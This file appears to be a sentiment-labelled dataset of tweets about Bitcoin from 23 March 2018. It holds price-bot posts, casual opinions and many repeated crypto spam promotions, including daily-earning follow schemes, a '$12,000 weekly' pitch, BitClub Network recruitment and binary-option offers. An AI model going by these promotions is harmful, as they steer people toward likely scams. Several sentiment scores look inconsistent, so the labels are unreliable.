+Fri Mar 23 06:48:05 +0000 2018,There is only one Bitcoin.,0.0 +Fri Mar 23 06:48:22 +0000 2018,@8bitandstuff We have to dump nobbs in $bitcoin,0.0 +Fri Mar 23 06:48:40 +0000 2018,"@JoelOsteen Heaven Helps Those who Help Themselves. Get Started with Bitcoin trade and Earn over $12,000 Weekly. Follow the Right Part.",1.0 +Fri Mar 23 06:48:44 +0000 2018,"@Cointelegraph This debate about what coins are, including Bitcoin, is really stupid.",-1.0 +Fri Mar 23 06:48:50 +0000 2018,"Earn bitcoin on a daily basis! 
+ +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:49:11 +0000 2018,@Egon_01 @Nicknameul @el33th4xor on the bitcoin network? 😦why not bitcoin cash? blocks too big?,0.0 +Fri Mar 23 06:50:01 +0000 2018,"BTC-SIB AskRate: 0.00014245 #Bittrex #SIB $SIB #Siberian Chervonets #altcoin #bitcoin #cryptocurrencies + ♥ FOLLOW for PROFIT",1.0 +Fri Mar 23 06:50:03 +0000 2018,"1 bitcoin = $8429.78 / 6834.283€ +1 bitcoin-cash = $966.927 / 783.917€ +1 ethereum = $517.549 / 419.593€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 06:51:08 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:51:18 +0000 2018,@HoldenCrypfield Bitcoin isn't a company.,0.0 +Fri Mar 23 06:51:29 +0000 2018,Bitcoin value: $8396.97,0.0 +Fri Mar 23 06:52:24 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:52:30 +0000 2018,"@nakamotech fan: h +winwin: i accept credit debit bitcoin",0.0 +Fri Mar 23 06:52:35 +0000 2018,Bitcoin drops over 4% after Japan warns largest operator #Market,0.0 +Fri Mar 23 06:52:43 +0000 2018,@officialmcafee so when is your $1M bitcoin price call gona happen?,0.0 +Fri Mar 23 06:53:16 +0000 2018,@SiLoMixMaster @BigCheds Icon is gaining while Bitcoin is dropping arm 🤑🤑,0.0 +Fri Mar 23 06:53:56 +0000 2018,"aEarn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:54:10 +0000 2018,Blocked by @wmiddelkoop because of #Bitcoin and #Crypto -- Bullish!,0.0 +Fri Mar 23 06:54:11 +0000 2018,@Altcoinbuzzio Litecoin bitcoin safest but plenty others quite safe,1.0 +Fri Mar 23 06:55:50 +0000 2018,@WhalePanda Whale is bitcoin and litecoin ⚡️atomic swap 🔜There wasn’t no update on the last show.,0.0 +Fri Mar 23 06:56:13 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:56:34 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:56:35 +0000 2018,"@Altcoinbuzzio Bitcoin, obvs..",0.0 +Fri Mar 23 06:58:29 +0000 2018,@contestpal How many RS. in a Bitcoin?,1.0 +Fri Mar 23 06:58:53 +0000 2018,Is Bitcoin Cash [BTG] dying a slow death @360_trader? #BTC #bitcoin #TA,-1.0 +Fri Mar 23 06:59:00 +0000 2018,"23% of Lost Bitcoin May Never Be Recovered~ TimeBox will fix the problem in future! + +#BTC #ETH #Timebox",0.0 +Fri Mar 23 06:59:03 +0000 2018,Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30394.88877000 | BITCOIN(BLCHAIN) R$27791.66 | LITECOIN(MCDTBC) R$573.33000000,0.0 +Fri Mar 23 06:59:21 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 06:59:25 +0000 2018,Nigga had 40 bitcoin on a flash drive,0.0 +Fri Mar 23 06:59:32 +0000 2018,"@eco is a pretty awesome concept..if it succeeds, I see myself using it + +#eco #bitcoin #crypto #blockchain",1.0 +Fri Mar 23 07:00:00 +0000 2018,"Bad news: Bitcoin on the decline. +Current Rate: 8383.1 USD = 1 BTC",-1.0 +Fri Mar 23 07:00:00 +0000 2018,"@ #1, Bitcoin with unit price of $8,415.39, market cap of $142,511,053,109 (44.31%), and 24 hr vol. 
of $5,562,470,000 (37.71%)",0.0 +Fri Mar 23 07:00:01 +0000 2018,"Mar 23, 2018 12:00AM #Bitcoin Price: +USD 8634.59 | EUR 7012.58 | JPY 914988.62",0.0 +Fri Mar 23 07:00:01 +0000 2018,"Average Bitcoin market price is: USD 8,382.36, EUR 6,803.94",-1.0 +Fri Mar 23 07:00:01 +0000 2018,"Bitcoin - BTC +Price: $8,422.22 +Change in 1h: -0.32% +Market cap: $142,626,716,256.00 +Ranking: 1 +#Bitcoin #BTC",0.0 +Fri Mar 23 07:00:03 +0000 2018,"Bitcoin:$8415.39 +Ethereum:$517.299 +Bitcoin Cash:$969.716 +Litecoin:$158.245 +Ripple:$0.634575 +IOTA:$1.26241",0.0 +Fri Mar 23 07:00:04 +0000 2018,"1 bitcoin = $8415.39 / 6822.617€ +1 bitcoin-cash = $967.81 / 784.633€ +1 ethereum = $517.35 / 419.431€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 07:00:04 +0000 2018,2018-03-23 07:00 UTC Bitcoin Price: 8383.70 USD,0.0 +Fri Mar 23 07:00:06 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:00:11 +0000 2018,"Buy? Sell? Or wait? Daily Forecasts for EURUSD, GBPUSD, USDJPY, Bitcoin, etc. on Daily, Weekly and Monthly charts. #ForexTips",0.0 +Fri Mar 23 07:00:12 +0000 2018,"1 #BTC (#Bitcoin) quotes: +$8375.55/$8383.69 #Bitstamp +$8368.09/$8373.98 #Kraken +⇢$-15.60/$-1.57 +$8321.19/$8404.84 #Coinbase +⇢$-62.50/$29.29",0.0 +Fri Mar 23 07:00:15 +0000 2018,Top 6 BTC/USD Exchange Orderbooks: Resistance til $8600:$25.0M; Support til $8100:$50.4M $BTC $BTCUSD #bitcoin #orderbook #crypto #markets,1.0 +Fri Mar 23 07:00:22 +0000 2018,Monthly Web Traffic for Major Bitcoin Exchanges Falls by Half #ico #cryptocurrency #token,-1.0 +Fri Mar 23 07:00:24 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:00:26 +0000 2018,#XEM Price is 0.00003298 (-0.00000008) #BTC / 0.276503 (-0.00132) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 07:00:28 +0000 2018,#ADA Price is 0.00002259 (+0.00000004) #BTC / 0.189401 (-0.00015) #USD. 
Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 07:00:29 +0000 2018,#DASH Price is 0.0474978 (-0.00038850) #BTC / 398.212 (-4.25500) #USD. Market rank is 12. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 07:00:29 +0000 2018,#SUB Price is 0.00004444 (-0.00000092) #BTC / 0.372594 (-0.00866) #USD. Market rank is 117. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 07:00:30 +0000 2018,#EOS Price is 0.00077674 (-0.00000378) #BTC / 6.51204 (-0.04799) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 07:00:30 +0000 2018,"BTC hourly update +$8394.84 | -0.0018%📉 +$BTC #BTCUSD #Bitcoin",0.0 +Fri Mar 23 07:00:38 +0000 2018,#xatracoin is wonderful project. Don't miss it! #XTR #ICO #XATRA #Blockchain #Coin #BTC #bitcoin #ETH #Ethereum,1.0 +Fri Mar 23 07:00:40 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:00:52 +0000 2018,"#Bitcoin $8,381.78 v #BitcoinCash $965.99 (BTC/BCH 8.7), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 16:00JST",0.0 +Fri Mar 23 07:00:55 +0000 2018,Current price of Bitcoin is $8376.47 #bitcoin,0.0 +Fri Mar 23 07:00:56 +0000 2018,Current price of Bitcoin is $8376.47 via Chain,0.0 +Fri Mar 23 07:01:11 +0000 2018,"The current price of Bitcoin is $8476.41. +The current price of BCash is $974.314, or 0.115429 BTC",0.0 +Fri Mar 23 07:01:12 +0000 2018,Change publishing forever Accept #bitcoin payments ask thehumanfaucet to get started #askastoreaday,0.0 +Fri Mar 23 07:01:19 +0000 2018,Current price of Bitcoin is $8376.47 via @Chain #bitcoin #finance,0.0 +Fri Mar 23 07:01:21 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:01:24 +0000 2018,Current #Bitcoin price: $8376.47,0.0 +Fri Mar 23 07:01:24 +0000 2018,Current price of Bitcoin is $8376.47 “Like” if thats good for you and “retweet” if thats not good for you #bitcoin #btc #bitcoinprice,1.0 +Fri Mar 23 07:01:26 +0000 2018,"I earn R36000 a month +Inbox for a relationship. +#TrapaDrive +#SaWasABetterPlaceBefore +#bitcoin",0.0 +Fri Mar 23 07:01:28 +0000 2018,Current price of Bitcoin is $8376.47,0.0 +Fri Mar 23 07:01:29 +0000 2018,"ToysRus Everyday you miss not accepting #bitcoin ,is money lost, can you afford another year like this? thehumanfaucet will get you started",-1.0 +Fri Mar 23 07:01:32 +0000 2018,Current price of Bitcoin is $8376.47.,0.0 +Fri Mar 23 07:01:34 +0000 2018,Bitcoin 8376.47 $,0.0 +Fri Mar 23 07:01:39 +0000 2018,"The current price of Bitcoin is $8476.41. +The current price of BCash is $974.314, or 0.115429 BTC",0.0 +Fri Mar 23 07:01:42 +0000 2018,Current price of Bitcoin is $8376.47 via Chain,0.0 +Fri Mar 23 07:01:52 +0000 2018,Current price of Bitcoin is $8376.47 via Chain,0.0 +Fri Mar 23 07:01:52 +0000 2018,"CRYPTOCURRENC Give responds by cutting taxes and increase spending, currency devalues bitcoin soars #cryptonews #crypto #altcoins",-1.0 +Fri Mar 23 07:01:54 +0000 2018,Current price of Bitcoin is $8376.47 via Chain,0.0 +Fri Mar 23 07:01:56 +0000 2018,Current price of Bitcoin is $8376.47 via Chain,0.0 +Fri Mar 23 07:02:22 +0000 2018,Current price of Bitcoin is $8376.47 #Bitcoin #Finance #Entrepreneur,0.0 +Fri Mar 23 07:02:23 +0000 2018,Current price of Bitcoin is $8376.47 $BTC You down?,-1.0 +Fri Mar 23 07:02:25 +0000 2018,#FYI Current price of #Bitcoin is $8376.47,0.0 +Fri Mar 23 07:02:34 +0000 2018,Cryptobot reporting that 1 Bitcoin is now 8376.47 USD! #bitcoin #cryptocurrency,0.0 +Fri Mar 23 07:02:35 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:02:47 +0000 2018,"THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN +JOIN BITCLUB NETWORK!! +[Virtual currency mining Encryption currency]",1.0 +Fri Mar 23 07:02:47 +0000 2018,"THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN +JOIN BITCLUB NETWORK! !",1.0 +Fri Mar 23 07:03:14 +0000 2018,Current price of Bitcoin is $8376.47,0.0 +Fri Mar 23 07:03:15 +0000 2018,Current price of Bitcoin is $8376.47 via @BTCpx #BTC $BTC,0.0 +Fri Mar 23 07:03:16 +0000 2018,Current price of #Bitcoin $btc is $8376.47,0.0 +Fri Mar 23 07:03:24 +0000 2018,Current price of #Bitcoin is $8376.47,0.0 +Fri Mar 23 07:03:26 +0000 2018,Monthly Web Traffic for Major Bitcoin Exchanges Falls by Half #ico #cryptocurrency #token,-1.0 +Fri Mar 23 07:03:32 +0000 2018,Current price of #Bitcoin is $8376.47,0.0 +Fri Mar 23 07:03:32 +0000 2018,#Bitcoin Price 8376.47 USD via Chain,0.0 +Fri Mar 23 07:04:18 +0000 2018,"@RampCapitalLLC if #Bitcoin isn’t $10Trillion by next week, I will eat my breakfast live on Facebook.",1.0 +Fri Mar 23 07:04:20 +0000 2018,Current price of Bitcoin is $8376.47,0.0 +Fri Mar 23 07:04:20 +0000 2018,Current price of Bitcoin is $8718.74 via Chain,0.0 +Fri Mar 23 07:04:25 +0000 2018,@alextohme Well @jack thinks the whole world will be on some form of global bitcoin in 10years - so all the $$ mean nothing 😂😂,-1.0 +Fri Mar 23 07:04:29 +0000 2018,Current price of Bitcoin is $8376.47 via Chain,0.0 +Fri Mar 23 07:04:34 +0000 2018,Current price of Bitcoin is $8376.47 via Chain,0.0 +Fri Mar 23 07:04:43 +0000 2018,Good morning! The current price of Bitcoin is $8376.47.,1.0 +Fri Mar 23 07:04:49 +0000 2018,@Malowbar Bitcoin,0.0 +Fri Mar 23 07:06:04 +0000 2018,@Bitcoin What? 
Lol,1.0 +Fri Mar 23 07:06:35 +0000 2018,Monthly Web Traffic for Major Bitcoin Exchanges Falls by Half #ico #cryptocurrency #token #ROX #Robotinaico,-1.0 +Fri Mar 23 07:06:39 +0000 2018,Current price of Bitcoin is $9026.40 @Chain,0.0 +Fri Mar 23 07:06:40 +0000 2018,Current price of Bitcoin is $8610.90 @Chain,0.0 +Fri Mar 23 07:07:05 +0000 2018,"DataBroker DAO is the first marketplace to trade sensor data +#internetofthings #bitcoin",1.0 +Fri Mar 23 07:07:06 +0000 2018,"@ElongWilliam @barichnel We have many children of bitcoin like litecoin, coinbase. +Pm me for more information about it",1.0 +Fri Mar 23 07:07:38 +0000 2018,Current price of Bitcoin is $8376.47 #Bitcoin #Bithound,0.0 +Fri Mar 23 07:07:45 +0000 2018,@realDonaldTrump It's time to buy Bitcoin,0.0 +Fri Mar 23 07:07:46 +0000 2018,$ZECUSD entering oversold zone on interval 60m #cryptocurrency #trading #bitcoin #crypto #technicalanalysis,0.0 +Fri Mar 23 07:07:55 +0000 2018,"Sets your bar high, even if you fail. #Crypto #Bitcoin #Ethereum #Neo #ETN #Litecoin #JACKMATE",-1.0 +Fri Mar 23 07:08:06 +0000 2018,@officialmcafee @theemrsmcafee Your ding dong is safe. #Bitcoin #Litecoin #Ethereum #Monero #NEO #HODL,1.0 +Fri Mar 23 07:08:30 +0000 2018,$BTCUSD entering oversold zone on interval 60m #cryptocurrency #trading #bitcoin #crypto #technicalanalysis,0.0 +Fri Mar 23 07:09:17 +0000 2018,BTC $8415.39 Down -$21.75 -0.26% in the last hour #bitcoin #bitsmart,-1.0 +Fri Mar 23 07:09:19 +0000 2018,@CryptoCountant Come on Bitcoin do your thing so i can buy some cheap WAN,1.0 +Fri Mar 23 07:10:03 +0000 2018,"Bitcoin BTC Current Price: +$8.422,220 +1 Hour: -0.32 % | 24 Hours: -6.66 % | 7 Days: 2.84 % +#btc #bitcoin",0.0 +Fri Mar 23 07:10:04 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:10:04 +0000 2018,"1 bitcoin = $8449.41 / 6850.198€ +1 bitcoin-cash = $970.175 / 786.55€ +1 ethereum = $517.205 / 419.314€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 07:10:35 +0000 2018,"The technology is not under threat at all, it is extraordinary, highly successful #pauldavis #bitcoin #bitcoins #bitcoinworld",1.0 +Fri Mar 23 07:10:42 +0000 2018,"Kept my head down for couple weeks. Whats the news in crypto.........same as everyday, sweet. #crypto #bitcoin",-1.0 +Fri Mar 23 07:11:21 +0000 2018,:( :( ....[Bitcoin performance assessment (-0.58%)] #bitcoin,-1.0 +Fri Mar 23 07:11:30 +0000 2018,Bitcoin value: $8427.19,0.0 +Fri Mar 23 07:12:08 +0000 2018,bitcoin,0.0 +Fri Mar 23 07:12:14 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:14:26 +0000 2018,"🌈 Status Update: Tracking 314 Bitcoin addresses with a current balance of 162.65K BTC / 1.37B USD +#bitcoin #cryptopaymon 🤖",0.0 +Fri Mar 23 07:14:27 +0000 2018,@enekoknorr Fortunately (for them) most of it on Bitcoin.,1.0 +Fri Mar 23 07:14:52 +0000 2018,"Current Bitcoin Price = $9428.13 --- Includes Sum of Forks, Core $8406.00 (89.16%) + Cash $964.97 (10.23%) + Gold $57.16 (0.61%)",0.0 +Fri Mar 23 07:14:59 +0000 2018,@TheCryptoDog Never heard of them. Is that like the bitcoin?,0.0 +Fri Mar 23 07:15:02 +0000 2018,"The current price of Bitcoin is $8449.41. +The current price of BCash is $970.175, or 0.115625 BTC",0.0 +Fri Mar 23 07:16:04 +0000 2018,"Use your browser to passively mine bitcoin and receive mining rewards instantly to your account, credited every hour.start is→http://freebit",0.0 +Fri Mar 23 07:16:36 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:17:03 +0000 2018,"Bitcoin Cash BCH Current Price: +$973,353 +1 Hour: 0.04 % | 24 Hours: -7.08 % | 7 Days: 5.85 % +#bch #bitcoin cash",0.0 +Fri Mar 23 07:17:15 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:17:43 +0000 2018,"Fri Mar 23 08:17:22 2018 (69:54) +USD : 8416.92 +Wght: 0.42 +Blk#: 514767 +Size: 1050.1 KB +TXs: 2151 +Pool: 6729 (4.3 MB) +#bitcoin",0.0 +Fri Mar 23 07:18:30 +0000 2018,@zebpay TCC is Next Bitcoin,0.0 +Fri Mar 23 07:18:37 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:18:38 +0000 2018,@officialmcafee @theemrsmcafee JAPAN FUD = BITCOIN CRASH. Every FUD = crash. Bubble has burst.,0.0 +Fri Mar 23 07:18:40 +0000 2018,New #bitcoin block 00000000000000000046e410eb1454e5ba5c83eb5df6253414a3127e02e3ed9a mined at height 514767.,1.0 +Fri Mar 23 07:19:01 +0000 2018,NEO is now £45.88. #crypto #cryptocurrency #bitcoin #altcoins,0.0 +Fri Mar 23 07:19:13 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:19:59 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:20:00 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:20:03 +0000 2018,"1 bitcoin = $8440.96 / 6843.347€ +1 bitcoin-cash = $973.353 / 789.127€ +1 ethereum = $517.037 / 419.177€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 07:21:13 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:22:50 +0000 2018,@ssohanurrahman2 what price did you first get into Bitcoin at?,1.0 +Fri Mar 23 07:23:47 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. 
Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:24:00 +0000 2018,Pls I wanna go into bitcoin business. Anyone with advice please help I don't wanna lose my cash.,0.0 +Fri Mar 23 07:24:30 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:24:59 +0000 2018,Join the comunnity #bitcoin #cryptocurrency #alts #ALTSEASON #Blockchain #Forum #Airdrops #BountyProgram,0.0 +Fri Mar 23 07:25:03 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:25:05 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:25:12 +0000 2018,"@RealJamesWoods @dtannie Forgot to say, thanks, Woods. #bitcoin BoycottCosco",1.0 +Fri Mar 23 07:25:14 +0000 2018,"Fri Mar 23 08:25:11 2018 (7:49) +USD : 8398.21 +Wght: 0.42 +Blk#: 514768 +Size: 1125.3 KB +TXs: 2223 +Pool: 5350 (3.7 MB) +#bitcoin",0.0 +Fri Mar 23 07:25:51 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:25:53 +0000 2018,New #bitcoin block 000000000000000000303b4f6effdf147d5954ca6a640d7b78bf09a99b57f36b mined at height 514768.,1.0 +Fri Mar 23 07:26:01 +0000 2018,"@Bitcoin Doesn‘t look very centralized to me, tbh",1.0 +Fri Mar 23 07:26:21 +0000 2018,:( :( ....[Bitcoin performance assessment (-0.24%)] #bitcoin,-1.0 +Fri Mar 23 07:27:49 +0000 2018,"@Dark_Realist @LuminousNebulae @hellosugoi @bitcoinmom @La__Cuen I love, love, love my Bitcoin family. ⚘⚘⚘",1.0 +Fri Mar 23 07:28:04 +0000 2018,"@Bitfinexed Even DMM in Japan is dealing with Bitcoin now, why gave the profits and advantages to the shity Chinese Tether exchange?",0.0 +Fri Mar 23 07:28:54 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:29:29 +0000 2018,"Earn bitcoin on a daily basis! + +1. 
Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:30:02 +0000 2018,"BTC-SEQ AskRate: 0.00002180 #Bittrex #SEQ $SEQ #Sequence #altcoin #altcoins #bitcoin + ♥ FOLLOW for PROFIT",1.0 +Fri Mar 23 07:30:02 +0000 2018,"Bitcoin:$8437.33 +Ethereum:$515.595 +Bitcoin Cash:$971.782 +Litecoin:$158.2 +Ripple:$0.632992 +IOTA:$1.25814",0.0 +Fri Mar 23 07:30:03 +0000 2018,"1 bitcoin = $8437.33 / 6840.404€ +1 bitcoin-cash = $969.847 / 786.285€ +1 ethereum = $514.437 / 417.07€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 07:30:04 +0000 2018,One Bitcoin now worth $8407.38@bitstamp. High $9025.000. Low $8342.000. Market Cap $142.372 Billion #bitcoin,1.0 +Fri Mar 23 07:30:27 +0000 2018,#XEM Price is 0.00003286 (-0.00000012) #BTC / 0.27662 (+0.00012) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 07:30:28 +0000 2018,#SUB Price is 0.00004490 (+0.00000046) #BTC / 0.377967 (+0.00537) #USD. Market rank is 117. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 07:30:29 +0000 2018,#ADA Price is 0.00002263 (+0.00000004) #BTC / 0.189696 (+0.00029) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 07:30:31 +0000 2018,#EOS Price is 0.00077847 (+0.00000173) #BTC / 6.52517 (+0.01313) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 07:30:31 +0000 2018,#DASH Price is 0.0475073 (+0.00000950) #BTC / 398.208 (-0.00400) #USD. Market rank is 12. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 07:30:38 +0000 2018,@joshkettle1 He’ll be a bust #bitcoin,0.0 +Fri Mar 23 07:30:48 +0000 2018,Sooner or later people are gonna realise that compared to bitcoin most alts are just zimbabwe dollars. I think.,1.0 +Fri Mar 23 07:31:13 +0000 2018,"Hello humans, #Bitcoin is currently around $8434.47 as of Fri Mar 23 02:31:09 CDT 2018",0.0 +Fri Mar 23 07:31:31 +0000 2018,Bitcoin value: $8405.7,0.0 +Fri Mar 23 07:31:33 +0000 2018,@Altcoinbuzzio Bitcoin,0.0 +Fri Mar 23 07:31:41 +0000 2018,"Earn bitcoin on a daily basis! + +1. 
Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:32:02 +0000 2018,@rogerkver @Falkvinge Bitcoin Cash is zimbabwe dollars compared to bitcoin.,0.0 +Fri Mar 23 07:32:37 +0000 2018,"@Cyrii_Lightning maybe not bitcoin but thats a cool concept for sure +like an economy death note type deal",1.0 +Fri Mar 23 07:32:43 +0000 2018,"9/10🌍 +If you personalize losses, you can't trade + +$btc $alts #bitcoin #cryptocurrency #investing #trading",0.0 +Fri Mar 23 07:32:44 +0000 2018,so wassup with these bitcoin ATM's? 🤔,0.0 +Fri Mar 23 07:33:13 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:33:39 +0000 2018,Bitcoin hasn't went up or down $100 in the past five hours...boring,-1.0 +Fri Mar 23 07:33:59 +0000 2018,@zebpay TCC (The Champ Coin) first and best Indian crypto currency who became next bitcoin,1.0 +Fri Mar 23 07:34:14 +0000 2018,@CNBC Bitcoin is only theoretically pure. It can easily (and is) be controlled by single entities,1.0 +Fri Mar 23 07:34:51 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:35:17 +0000 2018,for all the flaws in sex at least it will never be the next bitcoin,-1.0 +Fri Mar 23 07:35:17 +0000 2018,"Short term Bitcoin is going down, wait for a big dip to buy",-1.0 +Fri Mar 23 07:35:19 +0000 2018,I just won free 20 satoshi from WeLoveBitcoin 😍 #bitcoin #faucet #satoshi #freebitcoin @welovefaucet,1.0 +Fri Mar 23 07:35:31 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:35:39 +0000 2018,"@Capn_Flint For a second i thought its the bitcoin bubble finally bursting. Now Im sad. +BUT DAMN! 
Congrats!",-1.0 +Fri Mar 23 07:36:03 +0000 2018,@abigail10t8imo3 if you are interested in trading binary option trade and bitcoin mining message me for more info fs302399@gmail.com,1.0 +Fri Mar 23 07:36:14 +0000 2018,I LOVE Bitcoin,1.0 +Fri Mar 23 07:36:17 +0000 2018,"SKYF chain it is bounty program very potential +#skyfchain +#ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale",0.0 +Fri Mar 23 07:36:18 +0000 2018,Hey dude fuck you and your bitcoin investment opportunity. Acting like I ain’t ever heard of coinbase or others,-1.0 +Fri Mar 23 07:36:55 +0000 2018,@arthwollipot I didn't know you were doing Bitcoin.,0.0 +Fri Mar 23 07:38:15 +0000 2018,@zebpay TCC (THE CHAMPCOIN) HAS POTENTIAL TO BE NEXT BITCOIN AS ITS TECHNOLOGY IS ADVANCE AND HAVING BIG COMMUNITY,0.0 +Fri Mar 23 07:38:31 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:38:39 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:38:44 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:38:56 +0000 2018,"Well, I think different, for me Bitcoin Core is #BitcoinCore. #BitcoinCash is #bitcoin and #cash! @Egon_01",0.0 +Fri Mar 23 07:39:33 +0000 2018,"BTC,ETH,ETC,LTC,BCH,MONA +Please please give me a little earlier Christmas present ...  
+#Bitcoin #VirtualCurrency",-1.0 +Fri Mar 23 07:40:03 +0000 2018,"1 bitcoin = $8426.81 / 6831.876€ +1 bitcoin-cash = $969.099 / 785.678€ +1 ethereum = $513.803 / 416.556€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 07:40:26 +0000 2018,Remember when bitcoin was a safe haven asset?,1.0 +Fri Mar 23 07:40:33 +0000 2018,"""There are 3 eras of currency: commodity based, politically based, and now, math based."" - Chris Dixon #bitcoin #quote",0.0 +Fri Mar 23 07:40:54 +0000 2018,@CryptoYoda1338 DOW crash = Bitcoin crash IMO,0.0 +Fri Mar 23 07:40:59 +0000 2018,@ALLinPav This is good for bitcoin!,1.0 +Fri Mar 23 07:41:15 +0000 2018,"I am experimenting whether I can live only with bit coins donated. Please cooperate. + +12BZeZHNnuy9bVNxqNjNcFi3T91bxLVep ##bitcoin #Donation",1.0 +Fri Mar 23 07:41:28 +0000 2018,"Optimal tx fee: 5 satoshi per byte. +BTC : $8423 / €6823 / £5966 @ Block 514768. +Market Cap: 143.29B USD. #Bitcoin #Fintech",0.0 +Fri Mar 23 07:41:29 +0000 2018,"B stands for Bear Run +B stands for Bitcoin +B also stands for Block!!🚫❌ don’t be afraid to use this amazing functionality on social media.",1.0 +Fri Mar 23 07:41:36 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 07:41:39 +0000 2018,"@APompliano @iamjosephyoung if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 07:42:11 +0000 2018,"@ErikVoorhees if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com",1.0 +Fri Mar 23 07:42:28 +0000 2018,@BithumbOfficial Skycoin is Next Bitcoin!Lol,0.0 +Fri Mar 23 07:43:20 +0000 2018,@CryptoNikita What are you buying these days Nikita? 
